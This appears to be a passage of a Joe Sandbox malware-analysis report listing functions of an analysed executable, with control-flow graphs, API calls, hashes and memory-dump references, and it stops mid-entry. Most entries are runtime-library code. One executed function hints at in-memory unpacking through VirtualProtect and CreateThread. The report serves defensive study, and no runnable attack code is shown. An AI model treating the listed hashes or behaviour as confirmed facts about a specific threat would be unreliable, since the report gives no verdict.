                                                      • Opcode ID: d0c3dee8843f75799489d0f138ea0b3a873eba5d389f69fc1cc98fd2a6883df3
                                                      • Instruction ID: 2990f890607757f5a922091944e2d609da319efa880150a095de5bbc830048ac
                                                      • Opcode Fuzzy Hash: d0c3dee8843f75799489d0f138ea0b3a873eba5d389f69fc1cc98fd2a6883df3
                                                      • Instruction Fuzzy Hash: 68018F31802609AADF306BB1AE0679E3A64AF51724F2441BFF844B61D1CE3C89498A5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041CC90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 165 41cc90-41ccaf 167 41ccb5-41cce4 165->167 168 41cdbb-41d53c GetPEB 165->168 171 41cce6-41ccf2 167->171 172 41cd0d-41cd19 167->172 169 41d57d-41d730 CreateThread 168->169 170 41d53e-41d57a call 4024a0 lstrlenW 168->170 176 41d752-41d905 WaitForSingleObject 169->176 177 41d732-41d74f Sleep call 4024a0 169->177 170->169 171->172 178 41ccf4-41ccff 171->178 173 41cd35-41cd40 172->173 174 41cd1b-41cd27 172->174 181 41cd42-41cd4e 173->181 182 41cd5c-41cd68 173->182 174->173 179 41cd29-41cd33 174->179 177->176 178->172 185 41cd01-41cd0b 178->185 186 41cd74-41cdb6 VirtualProtect 179->186 181->182 187 41cd50-41cd5a 181->187 182->186 188 41cd6a 182->188 185->186 187->186 188->186
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,00425010,00000040,?), ref: 0041CDB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: @
                                                      • API String ID: 544645111-2766056989
                                                      • Opcode ID: 4418e2bde67497345e7d08d8bbbdae751a2b4919af2dacef739c0337c382b28b
                                                      • Instruction ID: 75a87302821483790463d653b9acefaa2c69f64846734af4eb6d26f58d86bdb2
                                                      • Opcode Fuzzy Hash: 4418e2bde67497345e7d08d8bbbdae751a2b4919af2dacef739c0337c382b28b
                                                      • Instruction Fuzzy Hash: FF11DA71A04128CBDB68CB04EDD0BE9F7B2AB69304F1482DAD58DAB245C7789ED1CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041DBB0 Relevance: 3.5, APIs: 2, Instructions: 512COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 190 41dbb0-41dbb9 191 41dbc0-41de16 190->191 192 41dbbb 190->192 195 41de21-41de28 191->195 192->191 193 41dbbd 192->193 193->191 196 41de35-41de3c 195->196 197 41de2a-41de33 195->197 199 41de42-41dedb call 408389 196->199 200 41e12b-41e131 196->200 197->195 199->200 203 41dee1-41e0a4 call 41d910 call 4082c0 call 40822f call 402470 call 41c000 199->203 213 41e0a9-41e128 203->213 213->200
                                                      APIs
                                                      • _malloc.LIBCMT ref: 0041DECC
                                                      • _memset.LIBCMT ref: 0041E07C
                                                        • Part of subcall function 0040822F: __lock.LIBCMT ref: 0040824D
                                                        • Part of subcall function 0040822F: ___sbh_find_block.LIBCMT ref: 00408258
                                                        • Part of subcall function 0040822F: ___sbh_free_block.LIBCMT ref: 00408267
                                                        • Part of subcall function 0040822F: RtlFreeHeap.NTDLL(00000000,00000001,00423208,0000000C,0040F206,00000000,00423570,0000000C,0040F240,00000001,0041086E,?,00415A1F,00000004,00423800,0000000C), ref: 00408297
                                                        • Part of subcall function 0040822F: GetLastError.KERNEL32(?,00415A1F,00000004,00423800,0000000C,0040E360,00000001,0041087D,00000000,00000000,00000000,?,0041087D,00000001,00000214), ref: 004082A8
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                      • String ID:
                                                      • API String ID: 2273839258-0
                                                      • Opcode ID: 18f380a5402a9ca92be87728ed9d1d6be3a105e0eb3268b470f665fd647226b5
                                                      • Instruction ID: 525a01d4276e096fb288f17750ee73fcf24bc7da142748c9cf8dc237c7912a96
                                                      • Opcode Fuzzy Hash: 18f380a5402a9ca92be87728ed9d1d6be3a105e0eb3268b470f665fd647226b5
                                                      • Instruction Fuzzy Hash: 0DD17A6BD22F2C06F304053DDD8A3A49806D7EA335FA1E772ED79CB6E8C67D89460185
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040F079 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 214 40f079-40f09b HeapCreate 215 40f09d-40f09e 214->215 216 40f09f-40f0a8 214->216
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040F08E
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateHeap
                                                      • String ID:
                                                      • API String ID: 10892065-0
                                                      • Opcode ID: d0edcfdf08b9637156f68be5a89579f72dc6d33e05ecf5e5d9b571732366e468
                                                      • Instruction ID: 752dcf6b803cb9ba929166f7344018921869f66d3807af90a0c540f244c8e45e
                                                      • Opcode Fuzzy Hash: d0edcfdf08b9637156f68be5a89579f72dc6d33e05ecf5e5d9b571732366e468
                                                      • Instruction Fuzzy Hash: D4D0A7769943056EDB105F717C48B623FDCD788795F00847AF90CC6591F674C581CA08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00413578 Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___getlocaleinfo
                                                      • String ID:
                                                      • API String ID: 1937885557-0
                                                      • Opcode ID: 020488f2f5dac079309b909a4a3bbc09f7787dd2dac1646b10375557b69ebfc2
                                                      • Instruction ID: 481e8453f58d89bf96c151aa3e26672d27f2b5d65a9642549e7214787c1f8824
                                                      • Opcode Fuzzy Hash: 020488f2f5dac079309b909a4a3bbc09f7787dd2dac1646b10375557b69ebfc2
                                                      • Instruction Fuzzy Hash: A4E1EDB290064DFEEB11DAF1CC81DFFB7BDEB44788F10092BB61593041EAB4AA559760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402B90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __CxxThrowException@8.LIBCMT ref: 00402BD3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-1866435925
                                                      • Opcode ID: 812a0a1ae132bfdc707b62cf2de4f419502b545a2be966b308cf71b47a5b351a
                                                      • Instruction ID: 582ab88f02e5b86f610db7a2580e4b78016e8690ee7f8af608ca5f6596207ee3
                                                      • Opcode Fuzzy Hash: 812a0a1ae132bfdc707b62cf2de4f419502b545a2be966b308cf71b47a5b351a
                                                      • Instruction Fuzzy Hash: F1318C319002189BDB15EB51CE96FEDB334BB54304F5481ABE409372C5DAB8AE89CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040735E Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00407365
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040736F
                                                      • int.LIBCPMTD ref: 00407386
                                                        • Part of subcall function 00403D20: std::_Lockit::_Lockit.LIBCPMT ref: 00403D36
                                                      • std::locale::_Getfacet.LIBCPMTD ref: 0040738F
                                                      • ctype.LIBCPMT ref: 004073A9
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 004073BD
                                                      • __CxxThrowException@8.LIBCMT ref: 004073CB
                                                      • std::locale::facet::_Incref.LIBCPMTD ref: 004073DB
                                                      • std::locale::facet::facet_Register.LIBCPMT ref: 004073E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                      • String ID: bad cast
                                                      • API String ID: 2535038987-3145022300
                                                      • Opcode ID: 1379c0a6d88319947838c04e6e962b6869958e925bba7ebd3363b9122ea8cd79
                                                      • Instruction ID: fcf0c3036a91ed6d4d430263ba0a86760ec8eea11a40a9bc9ab3eb6a0992eecb
                                                      • Opcode Fuzzy Hash: 1379c0a6d88319947838c04e6e962b6869958e925bba7ebd3363b9122ea8cd79
                                                      • Instruction Fuzzy Hash: CC018E3190021997CB05EB619982AAEB235AF40724F20413FE810B72D1DF7CAA02D79E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040757D Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00407584
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040758E
                                                      • int.LIBCPMTD ref: 004075A5
                                                        • Part of subcall function 00403D20: std::_Lockit::_Lockit.LIBCPMT ref: 00403D36
                                                      • std::locale::_Getfacet.LIBCPMTD ref: 004075AE
                                                      • codecvt.LIBCPMT ref: 004075C8
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 004075DC
                                                      • __CxxThrowException@8.LIBCMT ref: 004075EA
                                                      • std::locale::facet::_Incref.LIBCPMTD ref: 004075FA
                                                      • std::locale::facet::facet_Register.LIBCPMT ref: 00407600
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                      • String ID: bad cast
                                                      • API String ID: 577375395-3145022300
                                                      • Opcode ID: 724c92b36877de02bebbfcc101ddd99d7760593737bf6d70fb174b301d872ed8
                                                      • Instruction ID: 0234305c793fc36e413bac2841398bb3da433a4839db7dc567d3fa02cbfa3116
                                                      • Opcode Fuzzy Hash: 724c92b36877de02bebbfcc101ddd99d7760593737bf6d70fb174b301d872ed8
                                                      • Instruction Fuzzy Hash: 2B018E31904618A7CB05EB61C882AEEB635AF40768F20453FE4117B2D1DF7CAA42979E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403C60 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403C6B
                                                      • int.LIBCPMTD ref: 00403C7D
                                                        • Part of subcall function 00403D20: std::_Lockit::_Lockit.LIBCPMT ref: 00403D36
                                                      • std::locale::_Getfacet.LIBCPMTD ref: 00403C8C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                      • String ID: bad cast
                                                      • API String ID: 3702371321-3145022300
                                                      • Opcode ID: d7f3f2c83ea86788e5715911672a769d94058c37080acac9ea1980dafcf32624
                                                      • Instruction ID: 641631514a291ec6eb761895ba9dd386da080ab41ea4be51978102a4e08a800c
                                                      • Opcode Fuzzy Hash: d7f3f2c83ea86788e5715911672a769d94058c37080acac9ea1980dafcf32624
                                                      • Instruction Fuzzy Hash: 2721E974D04209DBCB04EFA5D981AEEBBB4BF48305F20856EE415B72D0DB786B41CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405C90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00405C9B
                                                      • int.LIBCPMTD ref: 00405CAD
                                                        • Part of subcall function 00403D20: std::_Lockit::_Lockit.LIBCPMT ref: 00403D36
                                                      • std::locale::_Getfacet.LIBCPMTD ref: 00405CBC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                      • String ID: bad cast
                                                      • API String ID: 3702371321-3145022300
                                                      • Opcode ID: 289da77ba0289746a966c4be2f9d962841ea674fcb33afa542e32ad480ffb740
                                                      • Instruction ID: 1046cc1c868ef3ed3385219323bec5a0f6ab13d9a00f201b0224fc02e787792a
                                                      • Opcode Fuzzy Hash: 289da77ba0289746a966c4be2f9d962841ea674fcb33afa542e32ad480ffb740
                                                      • Instruction Fuzzy Hash: DE21E974D00209DBCB04EFA5D9859EEB7B4BF48304F20856FE415772D0DB786A41CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406020 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004061E0: _localeconv.LIBCMT ref: 004061E7
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0040607C
                                                        • Part of subcall function 004062A0: _strlen.LIBCMT ref: 004062AA
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 004060A0
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 004060C6
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00406113
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00406139
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00406168
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0040618A
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 004061A9
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: GetcvtLocinfo::_std::_$_localeconv_strlen
                                                      • String ID:
                                                      • API String ID: 3869368768-0
                                                      • Opcode ID: 942bd748ef52842c1c27c059d44c0f63ae50698e3c17c9ee93bcaf079ae1b77a
                                                      • Instruction ID: 55e195ea5dd5aeaefaeefb9f50ee513ee57d022d1a1c6e6c39091b5229ab1854
                                                      • Opcode Fuzzy Hash: 942bd748ef52842c1c27c059d44c0f63ae50698e3c17c9ee93bcaf079ae1b77a
                                                      • Instruction Fuzzy Hash: C85180B0900244ABDB04EF91C851FAEBB79EF84714F10806EF8056F3D6DB796A05CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BA01 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __CreateFrameInfo.LIBCMT ref: 0040BA29
                                                        • Part of subcall function 004087EC: __getptd.LIBCMT ref: 004087FA
                                                        • Part of subcall function 004087EC: __getptd.LIBCMT ref: 00408808
                                                      • __getptd.LIBCMT ref: 0040BA33
                                                        • Part of subcall function 004108CB: __getptd_noexit.LIBCMT ref: 004108CE
                                                        • Part of subcall function 004108CB: __amsg_exit.LIBCMT ref: 004108DB
                                                      • __getptd.LIBCMT ref: 0040BA41
                                                      • __getptd.LIBCMT ref: 0040BA4F
                                                      • __getptd.LIBCMT ref: 0040BA5A
                                                      • _CallCatchBlock2.LIBCMT ref: 0040BA80
                                                        • Part of subcall function 00408891: __CallSettingFrame@12.LIBCMT ref: 004088DD
                                                        • Part of subcall function 0040BB27: __getptd.LIBCMT ref: 0040BB36
                                                        • Part of subcall function 0040BB27: __getptd.LIBCMT ref: 0040BB44
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1602911419-0
                                                      • Opcode ID: 69d6474ef90c7e03ccc18af2a37f9976253e3b2a542cf446f348ab09f469676e
                                                      • Instruction ID: 268987e412fa38d4894914b0aed12166e40545febe7eb69f4d7f4837085f18b0
                                                      • Opcode Fuzzy Hash: 69d6474ef90c7e03ccc18af2a37f9976253e3b2a542cf446f348ab09f469676e
                                                      • Instruction Fuzzy Hash: 3B112671C00209DFDB00EFA1C586BED7BB0FF08318F10846AF814A7291DB789A499B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041432A Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __getptd.LIBCMT ref: 00414336
                                                        • Part of subcall function 004108CB: __getptd_noexit.LIBCMT ref: 004108CE
                                                        • Part of subcall function 004108CB: __amsg_exit.LIBCMT ref: 004108DB
                                                      • __amsg_exit.LIBCMT ref: 00414356
                                                      • __lock.LIBCMT ref: 00414366
                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414383
                                                      • InterlockedIncrement.KERNEL32(02211670), ref: 004143AE
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                      • String ID:
                                                      • API String ID: 4271482742-0
                                                      • Opcode ID: 5673f2651a6220e724555c373e1e5d02cd406d7ddb0886d80356875b5201919d
                                                      • Instruction ID: 07479296829b79ec32430e6045f018df948dc00fefbce982cb1a9c95eed98973
                                                      • Opcode Fuzzy Hash: 5673f2651a6220e724555c373e1e5d02cd406d7ddb0886d80356875b5201919d
                                                      • Instruction Fuzzy Hash: D1016131E01B19A7CB21ABA5A8057DE77B0BF84B14F15403BE82467691C73C69C5CBDD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405320 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 245COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00402780: std::locale::locale.LIBCPMTD ref: 00402791
                                                        • Part of subcall function 00405C90: std::_Lockit::_Lockit.LIBCPMT ref: 00405C9B
                                                        • Part of subcall function 00405C90: int.LIBCPMTD ref: 00405CAD
                                                        • Part of subcall function 00405C90: std::locale::_Getfacet.LIBCPMTD ref: 00405CBC
                                                        • Part of subcall function 004026D0: std::locale::facet::_Decref.LIBCPMTD ref: 004026E6
                                                      • _memmove_s.LIBCMT ref: 00405445
                                                      • std::ios_base::width.LIBCPMTD ref: 004055B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
